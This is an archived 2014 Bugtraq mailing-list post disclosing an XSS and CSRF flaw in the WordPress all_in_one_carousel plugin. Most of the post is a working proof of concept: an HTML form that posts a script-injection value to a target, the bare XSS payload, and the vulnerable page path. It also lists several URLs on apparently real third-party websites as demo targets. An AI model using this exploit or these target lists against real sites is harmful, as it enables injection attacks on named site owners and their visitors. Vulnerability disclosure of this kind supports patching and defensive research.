lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-Id: <201402100725.s1A7PrXG009527@sf01web1.securityfocus.com> Date: Mon, 10 Feb 2014 07:25:53 GMT From: iedb.team@...il.com To: bugtraq@...urityfocus.com Subject: Wordpress all_in_one_carousel Plugin /XSS/CSRF/ Vuln # Exploit : <center><b>Wordpress all_in_one_carousel Plugin Xss & Csrf Vulnerability </center><br><br> <html> <head> <title>Wordpress all_in_one_carousel Plugin Xss & Csrf Vulnerability [IeDb TeaM]</title> </head><body> <form action=\"http://YourTarget.Com\" id=\"formid\" method=\"post\"> <input name=\"name\" value=\'\"><script>alert(/IeDb.ir/)</script>\' /><br><br> <input type=\"submit\" value=\"Submit\"/> </form></body></html> # # XSS Code : \"><script>alert(/IeDb.ir/)</script> # # Vulnerable Page : # # Localhost/[AnyPath]/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php # # # [+] Image : http://sectime.ir/myfiles/Xss-wp.png # # # # D3m0 : # # http://www.gaffandigital.com/MattDejanovich/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php http://yourworldmotorsports.com/wp-content/plugins/all_in_one_carousel/all_in_one_carousel/tpl/add_carousel.php http://www.directorphilippemartinez.com/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php http://arborhillsgreatdanes.com/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php http://www.revsoft.com/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php # # # Gr33tz : All Members In IeDb.Ir/acc | Thanks : 8ThBit , Dr.3v1l And .... ########################### # Iranian Exploit DataBase = http://IeDb.Ir [2014-02-04] ###########################